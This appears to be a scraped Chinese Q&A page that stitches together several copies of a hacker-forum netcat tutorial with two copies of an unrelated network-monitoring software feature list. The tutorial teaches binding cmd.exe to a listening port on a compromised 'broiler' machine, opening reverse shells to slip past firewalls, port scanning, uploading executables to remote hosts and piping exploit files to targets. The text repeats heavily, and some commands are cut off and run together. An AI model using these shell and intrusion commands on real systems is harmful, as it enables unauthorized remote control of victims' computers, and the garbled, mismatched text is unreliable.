1.NC怎么用啊
NC使用教程使用动画可以提供给核心成员,菜鸟们也可向我索取在黑客界混如果不知道什么叫NC的话,那可真是白混了今天教大家如何来使用NC讲四个命令命令1:监听命令nc -l -p portnc -l -p port > e:log.datnc -l -v -p port参数解释:-l:监听端口,监听入站信息-p:后跟本地端口号-v:显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息提示:一般大家都爱用-vvnc -l -p 80这个很简单,监听80端口如果机器上运行这个命令,端口80被认为是开放的,可以欺骗很多扫描器的哦!nc -l -p 80 > e:log.dat呵呵,功能和上边一样,但是后边加了个“> e:log.dat”我想,学过ECHO那个命令的人都会知道吧,是在E盘创建一个log.dat的日志文件nc -l -v -p 80和上边命令相似,不过这次不是记录在文件里,而是会直接显示在运行着NC的屏幕上。
呵呵,讲了这么多,来实践下nc -l -v -p 80然后在浏览器中输入本机IP:127.0.0.1呵呵,看到什么?同样,上边两个也是一样,大家自己试验一下吧命令2:程序定向nc -l -p port -t -e cmd.exe本地机: nc -l -p port 或 nc -l -v -p port目标机:nc -e cmd.exe ip port参数解释:-l、-p两个参数已经解释过了-e;作用就是程序定向-t:以telnet的形式来应答例子nc -l -p 5277 -t -e cmd.exe知道运行在哪里吗?千万不要运行在自己的机器上,如果运行了,你机器就会变成一台TELNET的服务器了,呵呵,解释一下:监听本地端口5277的入站信息,同时将CMD.exe这个程序,重定向到端口5277上,当有人连接的时候,就让程序CMD.exe以TELNET的形式来响应连接要求。说白了,其实就是让他成为一台TELNET的肉鸡,所以这个命令要运行在你的肉鸡上。
(话外音:说这么多遍当我们白痴啊,快往下讲!!!)呵呵,咱们来找台肉鸡试试,我TELNET IP 5277HOHO~~如何?local machine:nc -l -p port ( or nc -l -v -p port )remote machine:nc -e cmd.exe ip port大家知道灰鸽子和神偷吧,这两款工具都是利用了反弹端口型的木马,什么叫反弹端口?就是说,当对方中马后,不用你主动和对方连接,也就是说不用从你的client端向对方主机上运行的server端发送请求连接,而是对方主动来连接你这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。
这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。为什么?咳!!听我给你讲啊!!(先交100000000RMB学费)哇,别杀我啊!!)nc -l -p 5277 (坚听本地5277端口)同样也可以用nc -l -v -p 5277运行在本地然后在远程机器上,想办法运行nc -e cmd.exe ip 5277(你可别真的打“ip”在肉机上啊)要打,xxx.xxx.xxx.xxx这样!!呵呵,看看在本地机器上出现了什么?这样就是反弹~~在本地机器上得到了一个SHELL命令3:扫描端口nc -v ip portnc -v -z ip port-portnc -v -z -u ip port-port参数解释:-z:将输入输出关掉,在扫描时使用nc -v ip port这个命令是针对某一个端口进行扫描例如:nc -v ip 135扫描远程主机的135端口,这样获得了该端口的一些简单信息,但是针对某些端口,我们还可以获得更多的信息例如:80端口我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息nc -v -z ip port-port这个命令是用来扫描的一个命令,这个命令用于快速扫描TCP端口,而port-port则是指定了扫描的端口范围例如:nc -v -z ip 1-200可以看到我机器上的1-200的TCP端口的开放情况nc -v -z -u ip port-port这个命令比上个命令多了个-u,这个命令的作用仍然是扫描端口,只是多了一个-u的参数,是用来扫UDP端口的例如:nc -v -z -u ip 1-200这个命令就会扫1-200的UDP端口命令4:传送文件(HOHO,I LIKE)LOCAL MACHINE:nc -v -n ip port < x:svr.exeREMOTE MACHINE:nc -v -l -p port > y:svr.exe参数解释:-n:指定数字的IP地址这两个命令结合起来是用来传送文件的首先,在远程机上运行命令:nc -v -l -p 5277 > c:pulist.exe这个命令还记的吗?呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口并把接受到的信息数据写到c:pulist.exe中这时候在本地机上运行nc -v -n ip 5277 < e:hackpulist.exe这个命令的意思就是,从本地E盘跟目录中读取pulist.exe文件的内容,并把这些数据发送到ip的5277端口上这样远程主机就会自动创建一个pulist.exe文件。
呵呵,你想到了吗??上边是NC的比较常用的方法,希望通过这些,大家能发挥自己的想象力,创造出更多更精彩的命令来,因为NC的用法不仅仅局限于这几种而已哦!!对NC来说,只有想不到,没有做不到的!!。
2.nc如何使用一、基本使用想要连接到某处: nc [-options] hostname port[s] [ports] …绑定端口等待连接: nc -l -p port [-options] [hostname] [port]参数:-e prog 程序重定向,一旦连接,就执行 [危险!!]-g gateway source-routing hop point[s], up to 8G num source-routing pointer: 4, 8, 12, …-I secs 延时的间隔-l 监听模式,用于入站连接-n 指定数字的IP地址,不能用hostname-o file 记录16进制的传输-p port 本地端口号-r 任意指定本地及远程端口-s addr 本地源地址-t 以telnet的形式应答-u UDP模式-v 详细输出——用多个-v可得到更详细的内容-z 将输入输出关掉——用于扫描时-w secs timeout的时间二. 它的简单使用方法1.nc -l -p 80监听80端口2.nc -l -p 80 >c:log.dat监听80端口,并把信息记录到log.dat3.nc -v -l -p 80监听80端口,并显示端口信息4.nc -l -p 80 -t -e cmd.exe监听本地的80端口的入站信息,同时将cmd.exe重定向至80端口,当有人连接的时候,就让cmd.exe以telnet的形式应答5.nc -v ip port扫描某ip的某个端口6.nc -v -z ip port-port扫描某ip的某端口到某端口7.nc -v -z -u ip port-port扫描某ip的某udp端口到某udp端口7.扫描远程主机nc -nvv -w2 -z 192.168.x.x 80-445扫描192.168.x.x的TCP 80到TCP445的所有端口8.REMOTE主机绑定SHELLnc -l -p 5354 -t -e c:winntsystem32cmd.exe绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口9.REMOTE主机绑定SHELL并反向连接nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口三.使用的例子1. 计算机192.168.0.1运行:nc -v -n -p 99计算机192.168.0.8运行:nc -e cmd.exe 192.168.0.1 99这样我们就获得了192.168.0.8的一个shell2.计算机192.168.0.1运行:nc -v -n 192.168.0.8 99计算机192.168.0.8运行:nc -v -l -p 99 >d:sc.exe四.高级用法:1.作攻击程序用格式1:type c:exploit.txt|nc -nvv 192.168.x.x 80格式2:nc -nvv 192.168.x.x 80 c:log.txt使用"-L"可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到"c:log.txt"中,如果把">" 改为">>"即可以追加日志3.作蜜罐用nc -L -p 80 评论0 0 0。
3.NC怎么用啊NC使用教程使用动画可以提供给核心成员,菜鸟们也可向我索取在黑客界混如果不知道什么叫NC的话,那可真是白混了今天教大家如何来使用NC讲四个命令命令1:监听命令nc -l -p portnc -l -p port > e:log.datnc -l -v -p port参数解释:-l:监听端口,监听入站信息-p:后跟本地端口号-v:显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息提示:一般大家都爱用-vvnc -l -p 80这个很简单,监听80端口如果机器上运行这个命令,端口80被认为是开放的,可以欺骗很多扫描器的哦!nc -l -p 80 > e:log.dat呵呵,功能和上边一样,但是后边加了个“> e:log.dat”我想,学过ECHO那个命令的人都会知道吧,是在E盘创建一个log.dat的日志文件nc -l -v -p 80和上边命令相似,不过这次不是记录在文件里,而是会直接显示在运行着NC的屏幕上。
呵呵,讲了这么多,来实践下nc -l -v -p 80然后在浏览器中输入本机IP:127.0.0.1呵呵,看到什么?同样,上边两个也是一样,大家自己试验一下吧命令2:程序定向nc -l -p port -t -e cmd.exe本地机: nc -l -p port 或 nc -l -v -p port目标机:nc -e cmd.exe ip port参数解释:-l、-p两个参数已经解释过了-e;作用就是程序定向-t:以telnet的形式来应答例子nc -l -p 5277 -t -e cmd.exe知道运行在哪里吗?千万不要运行在自己的机器上,如果运行了,你机器就会变成一台TELNET的服务器了,呵呵,解释一下:监听本地端口5277的入站信息,同时将CMD.exe这个程序,重定向到端口5277上,当有人连接的时候,就让程序CMD.exe以TELNET的形式来响应连接要求。说白了,其实就是让他成为一台TELNET的肉鸡,所以这个命令要运行在你的肉鸡上。
(话外音:说这么多遍当我们白痴啊,快往下讲!!!)呵呵,咱们来找台肉鸡试试,我TELNET IP 5277HOHO~~如何?local machine:nc -l -p port ( or nc -l -v -p port )remote machine:nc -e cmd.exe ip port大家知道灰鸽子和神偷吧,这两款工具都是利用了反弹端口型的木马,什么叫反弹端口?就是说,当对方中马后,不用你主动和对方连接,也就是说不用从你的client端向对方主机上运行的server端发送请求连接,而是对方主动来连接你这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。
这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。为什么?咳!!听我给你讲啊!!(先交100000000RMB学费)哇,别杀我啊!!)nc -l -p 5277 (坚听本地5277端口)同样也可以用nc -l -v -p 5277运行在本地然后在远程机器上,想办法运行nc -e cmd.exe ip 5277(你可别真的打“ip”在肉机上啊)要打,xxx.xxx.xxx.xxx这样!!呵呵,看看在本地机器上出现了什么?这样就是反弹~~在本地机器上得到了一个SHELL命令3:扫描端口nc -v ip portnc -v -z ip port-portnc -v -z -u ip port-port参数解释:-z:将输入输出关掉,在扫描时使用nc -v ip port这个命令是针对某一个端口进行扫描例如:nc -v ip 135扫描远程主机的135端口,这样获得了该端口的一些简单信息,但是针对某些端口,我们还可以获得更多的信息例如:80端口我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息nc -v -z ip port-port这个命令是用来扫描的一个命令,这个命令用于快速扫描TCP端口,而port-port则是指定了扫描的端口范围例如:nc -v -z ip 1-200可以看到我机器上的1-200的TCP端口的开放情况nc -v -z -u ip port-port这个命令比上个命令多了个-u,这个命令的作用仍然是扫描端口,只是多了一个-u的参数,是用来扫UDP端口的例如:nc -v -z -u ip 1-200这个命令就会扫1-200的UDP端口命令4:传送文件(HOHO,I LIKE)LOCAL MACHINE:nc -v -n ip port y:svr.exe参数解释:-n:指定数字的IP地址这两个命令结合起来是用来传送文件的首先,在远程机上运行命令:nc -v -l -p 5277 > c:pulist.exe这个命令还记的吗?呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口并把接受到的信息数据写到c:pulist.exe中这时候在本地机上运行nc -v -n ip 5277 评论0 0 0。
4.NC用友系统怎么用NC网络管理软件相关的一些功能 功能分类 网管软件功能明细 在线演示 功能介绍 行为管理 实时结束进程 显示客户机进程,并可结束选中进程 锁定键盘/鼠标 可以对客户机执行锁定键盘鼠标的操作,目标客户机的鼠标键 盘将失去响应 注销/重启/关机 可以对客户机执行注销、重启以及关机操作 程序黑名单 可以全天或按时间段禁止客户机运行黑名单中的应用程序 程序白名单 可以全天或按时间段使客户机只允许运行白名单中的应用程序 网站黑名单 可以全天或按时间段禁止客户机浏览黑名单中的网站 网站白名单 可以全天或按时间段使客户机只允许浏览白名单中的网站 程序保护 对客户端的指定软件进行保护,当被监测的软件没有启动时, 服务器端会有报警 QQ/MSN/雅虎通/邮件/上网监控 在线演示 可以实时监控QQ、MSN、雅虎通等即时通讯软件,以及 邮件和上网监控 网络拓扑图 对局域网内的网络结构生成网络拓扑图,以直观的图形显示 出网结构,方便管理员进行管理 文档信息安全管理 浏览网站审计 记录客户机浏览的网站到日志中 文件操作审计 记录客户机文件变动的情况到日志中 打印机审计 记录客户机使用打印机的情况到日志中 光驱管理 对客户机的光驱进行禁用或启用操作 软驱管理 对客户机的软驱进行禁用或启用操作 USB存储管理 对客户机的USB存储设备进行禁用或启用操作 Modem管理 对客户机的Modem进行禁用或启用操作 USB接口管理 对客户机的USB接口进行禁用或启用操作 PCMCIA管理 对客户机的PCMCIA进行禁用或启用操作 红外线接口管理 对客户机的红外接口进行禁用或启用操作 IP地址设置 防止内部IP被盗用;使客户机只与合法IP地址的机器进行通讯 IP地址管理 防止内部IP被盗用;使客户机只与合法IP地址的机器进行通讯 补丁管理 由服务器远程对目标客户机安装指定的补丁 系统配置 系统配置 服务器设置:在此可以获得服务器的IP地址以及文件保存的路径 扫描设置:客户端设备未注册或IP变动时扫描使用 部门配置 客户机众多时,将客户机编辑到所在部门中,利于查找和管理 报警配置 可对硬件信息报警,软件信息报警,违规联网报警,非法设备报警,客 户机异常报警以及IP绑定变动报警进行配置 数据库配置 用于创建或删除数据库 网络维护 远程网络配置 用于网络管理人员对客户机的“网络配置”进行远程配置工作 批量网络配置 专为网络中有大量配置信息相同(如DNS服务器,网关等)的客 户机需要改动某项网络配置信息而设定的 禁止修改IP 禁止客户机修改IP IE设置 提供指定主页地址、清除Internet历史记录文件和为不同 区域的WEB内容进行安全设置等操作 截取屏幕 实时截取目标客户机当前屏幕信息 远程监视 实时连续截取目标客户机当前屏幕信息 远程调试 对目标客户机实施远程控制 资产信息 硬件信息 记录客户机已的硬件配置信息到数据库中 软件信息 记录客户机已安装的软件信息到数据库中 通信管理 即时流量查询 可以实时查询客户机当前内、外网流量以及最大流量的状况 历史流量查询 可以查询客户机内外网的天流量和月流量 互联网流量管理 可以限制客户机访问互联网时的带宽 通信协议管理 可对客户机的网络权限进行设置。
禁止客户机访问 网页、FTP、发送邮件等功能 报警事件 硬件信息报警 客户机硬件信息(如内存、硬盘等)发生变化时报警 软件信息报警 客户机软件信息发生变化时报警 违规联网报警 客户机进行违规联网时报警 非法设备报警 发现非法设备时报警 客户机异常报警 客户机发生异常时报警 IP绑定变化报警 IP绑定发生变动时报警。
5.nc如何使用一、基本使用想要连接到某处: nc [-options] hostname port[s] [ports] …绑定端口等待连接: nc -l -p port [-options] [hostname] [port]参数:-e prog 程序重定向,一旦连接,就执行 [危险!!]-g gateway source-routing hop point[s], up to 8G num source-routing pointer: 4, 8, 12, …-I secs 延时的间隔-l 监听模式,用于入站连接-n 指定数字的IP地址,不能用hostname-o file 记录16进制的传输-p port 本地端口号-r 任意指定本地及远程端口-s addr 本地源地址-t 以telnet的形式应答-u UDP模式-v 详细输出——用多个-v可得到更详细的内容-z 将输入输出关掉——用于扫描时-w secs timeout的时间二. 它的简单使用方法1.nc -l -p 80监听80端口2.nc -l -p 80 >c:log.dat监听80端口,并把信息记录到log.dat3.nc -v -l -p 80监听80端口,并显示端口信息4.nc -l -p 80 -t -e cmd.exe监听本地的80端口的入站信息,同时将cmd.exe重定向至80端口,当有人连接的时候,就让cmd.exe以telnet的形式应答5.nc -v ip port扫描某ip的某个端口6.nc -v -z ip port-port扫描某ip的某端口到某端口7.nc -v -z -u ip port-port扫描某ip的某udp端口到某udp端口7.扫描远程主机nc -nvv -w2 -z 192.168.x.x 80-445扫描192.168.x.x的TCP 80到TCP445的所有端口8.REMOTE主机绑定SHELLnc -l -p 5354 -t -e c:winntsystem32cmd.exe绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口9.REMOTE主机绑定SHELL并反向连接nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口三.使用的例子1. 计算机192.168.0.1运行:nc -v -n -p 99计算机192.168.0.8运行:nc -e cmd.exe 192.168.0.1 99这样我们就获得了192.168.0.8的一个shell2.计算机192.168.0.1运行:nc -v -n 192.168.0.8 99计算机192.168.0.8运行:nc -v -l -p 99 >d:sc.exe四.高级用法:1.作攻击程序用格式1:type c:exploit.txt|nc -nvv 192.168.x.x 80格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt连接到192.168.x.x的80端口,并在其管道中发送"c:exploit.txt"的内容(两种格式确有相同的效果, 真是有异曲同工之妙)2.作蜜罐用nc -L -p 80 > c:log.txt使用"-L"可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到"c:log.txt"中,如果把">" 改为">>"即可以追加日志3.作蜜罐用nc -L -p 80 < c:honeypot.txt使用"-L"可以不停地监听某一个端口,直到ctrl+c为止,并把"c:honeypot.txt"的内容"送"入其 管道中。
6.求一NC使用教程NC使用教程 使用动画可以提供给核心成员,菜鸟们也可向我索取 在黑客界混如果不知道什么叫NC的话,那可真是白混了 今天教大家如何来使用NC 讲四个命令 命令1:监听命令 nc -l -p port nc -l -p port > e:log.dat nc -l -v -p port 参数解释: -l:监听端口,监听入站信息 -p:后跟本地端口号 -v:显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息 提示:一般大家都爱用-vv nc -l -p 80 这个很简单,监听80端口 如果机器上运行这个命令,端口80被认为是开放的,可以欺骗很多扫描器的哦! nc -l -p 80 > e:log.dat 呵呵,功能和上边一样,但是后边加了个“> e:log.dat”我想,学过ECHO 那个命令的人都会知道吧,是在E盘创建一个log.dat的日志文件 nc -l -v -p 80 和上边命令相似,不过这次不是记录在文件里,而是会直接显示在运行着NC 的屏幕上。
呵呵,讲了这么多,来实践下 nc -l -v -p 80 然后在浏览器中输入本机IP:127.0.0.1 呵呵,看到什么? 同样,上边两个也是一样,大家自己试验一下吧 命令2:程序定向 nc -l -p port -t -e cmd.exe 本地机: nc -l -p port 或 nc -l -v -p port 目标机:nc -e cmd.exe ip port 参数解释: -l、-p两个参数已经解释过了 -e;作用就是程序定向 -t:以telnet的形式来应答 例子 nc -l -p 5277 -t -e cmd.exe 知道运行在哪里吗?千万不要运行在自己的机器上,如果运行了,你机器 就会变成一台TELNET的服务器了,呵呵,解释一下:监听本地端口5277的 入站信息,同时将CMD.exe这个程序,重定向到端口5277上,当有人连接的时候,就让程序CMD.exe以TELNET的形式来响应连接要求。 说白了,其实就是让他成为一台TELNET的肉鸡,所以这个命令要运行在你的肉鸡上。
(话外音:说这么多遍当我们白痴啊,快往下讲!!!) 呵呵,咱们来找台肉鸡试试,我TELNET IP 5277 HOHO~~如何? local machine:nc -l -p port ( or nc -l -v -p port ) remote machine:nc -e cmd.exe ip port 大家知道灰鸽子和神偷吧,这两款工具都是利用了反弹端口型的木马, 什么叫反弹端口?就是说,当对方中马后,不用你主动和对方连接,也就是说 不用从你的client端向对方主机上运行的server端发送请求连接,而是对方主动来连接你 这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。
这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。为什么? 咳!!听我给你讲啊!!(先交100000000RMB学费)哇,别杀我啊!!) nc -l -p 5277 (坚听本地5277端口) 同样也可以用 nc -l -v -p 5277 运行在本地 然后在远程机器上,想办法运行 nc -e cmd.exe ip 5277 (你可别真的打“ip”在肉机上啊)要打,xxx.xxx.xxx.xxx这样!! 呵呵,看看在本地机器上出现了什么? 这样就是反弹~~在本地机器上得到了一个SHELL 命令3:扫描端口 nc -v ip port nc -v -z ip port-port nc -v -z -u ip port-port 参数解释: -z:将输入输出关掉,在扫描时使用 nc -v ip port 这个命令是针对某一个端口进行扫描 例如: nc -v ip 135 扫描远程主机的135端口,这样获得了该端口的一些简单信息,但是针对某些端口,我们还可以获得更多的信息 例如:80端口 我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息 nc -v -z ip port-port 这个命令是用来扫描的一个命令,这个命令用于快速扫描TCP端口,而port-port则是指定了扫描的端口范围 例如: nc -v -z ip 1-200 可以看到我机器上的1-200的TCP端口的开放情况 nc -v -z -u ip port-port 这个命令比上个命令多了个-u,这个命令的作用仍然是扫描端口,只是多了一个-u的参数,是用来扫UDP端口的 例如: nc -v -z -u ip 1-200 这个命令就会扫1-200的UDP端口 命令4:传送文件(HOHO,I LIKE) LOCAL MACHINE:nc -v -n ip port < x:svr.exe REMOTE MACHINE:nc -v -l -p port > y:svr.exe 参数解释: -n:指定数字的IP地址 这两个命令结合起来是用来传送文件的 首先,在远程机上运行命令: nc -v -l -p 5277 > c:pulist.exe 这个命令还记的吗?呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口 并把接受到的信息数据写到c:pulist.exe中 这时候在本地机上运行 nc -v -n ip 5277 < e:hackpulist.exe 这个命令的意思就是,从本地E盘跟目录中读取pulist.exe文件的内容,并把这些数据发送到ip的5277端口上 这样远程主机就会自动创建一个pulist.exe文件。
呵呵,你想到了吗?? 上边是NC的比较常用的方法,希望通过这些,大家能发挥自己的想象力,创造出更多更精彩的命令来, 因为NC的用法不仅仅局限于这几种而已哦!!对NC来说,只有想不到,没有做不到的!!。
7.NC用友系统怎么用NC网络管理软件相关的一些功能
功能分类 网管软件功能明细 在线演示 功能介绍
行为管理
实时结束进程 显示客户机进程,并可结束选中进程
锁定键盘/鼠标 可以对客户机执行锁定键盘鼠标的操作,目标客户机的鼠标键
盘将失去响应
注销/重启/关机 可以对客户机执行注销、重启以及关机操作
程序黑名单 可以全天或按时间段禁止客户机运行黑名单中的应用程序
程序白名单 可以全天或按时间段使客户机只允许运行白名单中的应用程序
网站黑名单 可以全天或按时间段禁止客户机浏览黑名单中的网站
网站白名单 可以全天或按时间段使客户机只允许浏览白名单中的网站
程序保护 对客户端的指定软件进行保护,当被监测的软件没有启动时,
服务器端会有报警
QQ/MSN/雅虎通/邮件/上网监控 在线演示 可以实时监控QQ、MSN、雅虎通等即时通讯软件,以及
邮件和上网监控
网络拓扑图 对局域网内的网络结构生成网络拓扑图,以直观的图形显示
出网结构,方便管理员进行管理
文档信息安全管理
浏览网站审计 记录客户机浏览的网站到日志中
文件操作审计 记录客户机文件变动的情况到日志中
打印机审计 记录客户机使用打印机的情况到日志中
光驱管理 对客户机的光驱进行禁用或启用操作
软驱管理 对客户机的软驱进行禁用或启用操作
USB存储管理 对客户机的USB存储设备进行禁用或启用操作
Modem管理 对客户机的Modem进行禁用或启用操作
USB接口管理 对客户机的USB接口进行禁用或启用操作
PCMCIA管理 对客户机的PCMCIA进行禁用或启用操作
红外线接口管理 对客户机的红外接口进行禁用或启用操作
IP地址设置 防止内部IP被盗用;使客户机只与合法IP地址的机器进行通讯
IP地址管理 防止内部IP被盗用;使客户机只与合法IP地址的机器进行通讯
补丁管理 由服务器远程对目标客户机安装指定的补丁
系统配置
系统配置 服务器设置:在此可以获得服务器的IP地址以及文件保存的路径
扫描设置:客户端设备未注册或IP变动时扫描使用
部门配置 客户机众多时,将客户机编辑到所在部门中,利于查找和管理
报警配置 可对硬件信息报警,软件信息报警,违规联网报警,非法设备报警,客
户机异常报警以及IP绑定变动报警进行配置
数据库配置 用于创建或删除数据库
网络维护
远程网络配置 用于网络管理人员对客户机的“网络配置”进行远程配置工作
批量网络配置 专为网络中有大量配置信息相同(如DNS服务器,网关等)的客
户机需要改动某项网络配置信息而设定的
禁止修改IP 禁止客户机修改IP
IE设置 提供指定主页地址、清除Internet历史记录文件和为不同
区域的WEB内容进行安全设置等操作
截取屏幕 实时截取目标客户机当前屏幕信息
远程监视 实时连续截取目标客户机当前屏幕信息
远程调试 对目标客户机实施远程控制
资产信息 硬件信息 记录客户机已的硬件配置信息到数据库中
软件信息 记录客户机已安装的软件信息到数据库中
通信管理
即时流量查询 可以实时查询客户机当前内、外网流量以及最大流量的状况
历史流量查询 可以查询客户机内外网的天流量和月流量
互联网流量管理 可以限制客户机访问互联网时的带宽
通信协议管理 可对客户机的网络权限进行设置。禁止客户机访问
网页、FTP、发送邮件等功能
报警事件
硬件信息报警 客户机硬件信息(如内存、硬盘等)发生变化时报警
软件信息报警 客户机软件信息发生变化时报警
违规联网报警 客户机进行违规联网时报警
非法设备报警 发现非法设备时报警
客户机异常报警 客户机发生异常时报警
IP绑定变化报警 IP绑定发生变动时报警
8.求一NC使用教程NC使用教程使用动画可以提供给核心成员,菜鸟们也可向我索取在黑客界混如果不知道什么叫NC的话,那可真是白混了今天教大家如何来使用NC讲四个命令命令1:监听命令nc -l -p portnc -l -p port > e:log.datnc -l -v -p port参数解释:-l:监听端口,监听入站信息-p:后跟本地端口号-v:显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息提示:一般大家都爱用-vvnc -l -p 80这个很简单,监听80端口如果机器上运行这个命令,端口80被认为是开放的,可以欺骗很多扫描器的哦!nc -l -p 80 > e:log.dat呵呵,功能和上边一样,但是后边加了个“> e:log.dat”我想,学过ECHO那个命令的人都会知道吧,是在E盘创建一个log.dat的日志文件nc -l -v -p 80和上边命令相似,不过这次不是记录在文件里,而是会直接显示在运行着NC的屏幕上。
呵呵,讲了这么多,来实践下nc -l -v -p 80然后在浏览器中输入本机IP:127.0.0.1呵呵,看到什么?同样,上边两个也是一样,大家自己试验一下吧命令2:程序定向nc -l -p port -t -e cmd.exe本地机: nc -l -p port 或 nc -l -v -p port目标机:nc -e cmd.exe ip port参数解释:-l、-p两个参数已经解释过了-e;作用就是程序定向-t:以telnet的形式来应答例子nc -l -p 5277 -t -e cmd.exe知道运行在哪里吗?千万不要运行在自己的机器上,如果运行了,你机器就会变成一台TELNET的服务器了,呵呵,解释一下:监听本地端口5277的入站信息,同时将CMD.exe这个程序,重定向到端口5277上,当有人连接的时候,就让程序CMD.exe以TELNET的形式来响应连接要求。说白了,其实就是让他成为一台TELNET的肉鸡,所以这个命令要运行在你的肉鸡上。
(话外音:说这么多遍当我们白痴啊,快往下讲!!!)呵呵,咱们来找台肉鸡试试,我TELNET IP 5277HOHO~~如何?local machine:nc -l -p port ( or nc -l -v -p port )remote machine:nc -e cmd.exe ip port大家知道灰鸽子和神偷吧,这两款工具都是利用了反弹端口型的木马,什么叫反弹端口?就是说,当对方中马后,不用你主动和对方连接,也就是说不用从你的client端向对方主机上运行的server端发送请求连接,而是对方主动来连接你这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。
这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。为什么?咳!!听我给你讲啊!!(先交100000000RMB学费)哇,别杀我啊!!)nc -l -p 5277 (坚听本地5277端口)同样也可以用nc -l -v -p 5277运行在本地然后在远程机器上,想办法运行nc -e cmd.exe ip 5277(你可别真的打“ip”在肉机上啊)要打,xxx.xxx.xxx.xxx这样!!呵呵,看看在本地机器上出现了什么?这样就是反弹~~在本地机器上得到了一个SHELL命令3:扫描端口nc -v ip portnc -v -z ip port-portnc -v -z -u ip port-port参数解释:-z:将输入输出关掉,在扫描时使用nc -v ip port这个命令是针对某一个端口进行扫描例如:nc -v ip 135扫描远程主机的135端口,这样获得了该端口的一些简单信息,但是针对某些端口,我们还可以获得更多的信息例如:80端口我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息nc -v -z ip port-port这个命令是用来扫描的一个命令,这个命令用于快速扫描TCP端口,而port-port则是指定了扫描的端口范围例如:nc -v -z ip 1-200可以看到我机器上的1-200的TCP端口的开放情况nc -v -z -u ip port-port这个命令比上个命令多了个-u,这个命令的作用仍然是扫描端口,只是多了一个-u的参数,是用来扫UDP端口的例如:nc -v -z -u ip 1-200这个命令就会扫1-200的UDP端口命令4:传送文件(HOHO,I LIKE)LOCAL MACHINE:nc -v -n ip port < x:svr.exeREMOTE MACHINE:nc -v -l -p port > y:svr.exe参数解释:-n:指定数字的IP地址这两个命令结合起来是用来传送文件的首先,在远程机上运行命令:nc -v -l -p 5277 > c:pulist.exe这个命令还记的吗?呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口并把接受到的信息数据写到c:pulist.exe中这时候在本地机上运行nc -v -n ip 5277 < e:hackpulist.exe这个命令的意思就是,从本地E盘跟目录中读取pulist.exe文件的内容,并把这些数据发送到ip的5277端口上这样远程主机就会自动创建一个pulist.exe文件。
呵呵,你想到了吗??上边是NC的比较常用的方法,希望通过这些,大家能发挥自己的想象力,创造出更多更精彩的命令来,因为NC的用法不仅仅局限于这几种而已哦!!对NC来说,只有想不到,没有做不到的!!。
